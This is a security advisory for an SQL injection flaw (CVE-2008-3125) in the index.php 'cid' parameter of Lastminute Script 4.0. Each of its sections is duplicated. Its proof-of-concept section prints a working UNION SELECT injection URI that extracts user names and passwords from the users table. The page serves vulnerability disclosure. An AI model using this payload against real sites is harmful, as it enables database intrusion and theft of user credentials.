Lastminute Script 'index.php' SQL Injection Vulnerability
BID:30127
Info
Lastminute Script 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 30127 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3125 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 08 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | t0pP8uZz |
| Vulnerable: |
Mole Group Lastminute Script 4.0 |
| Not Vulnerable: | |
Discussion
Lastminute Script 'index.php' SQL Injection Vulnerability
Lastminute Script is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Lastminute Script 4.0 is vulnerable; other versions may also be affected.
Lastminute Script is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Lastminute Script 4.0 is vulnerable; other versions may also be affected.
Exploit / POC
Lastminute Script 'index.php' SQL Injection Vulnerability
Attackers can exploit this issue with a browser.
The following example URI is available:
http://www.example.com/index.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONVERT(CONCAT(name,0x3a,password,0x3C62723E)/**/using/**/latin1),2,3,4/**/FROM/**/users/*
Attackers can exploit this issue with a browser.
The following example URI is available:
http://www.example.com/index.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONVERT(CONCAT(name,0x3a,password,0x3C62723E)/**/using/**/latin1),2,3,4/**/FROM/**/users/*
Solution / Fix
Lastminute Script 'index.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Lastminute Script 'index.php' SQL Injection Vulnerability
References:
References:
- Lastminute Script Homepage (Mole Group)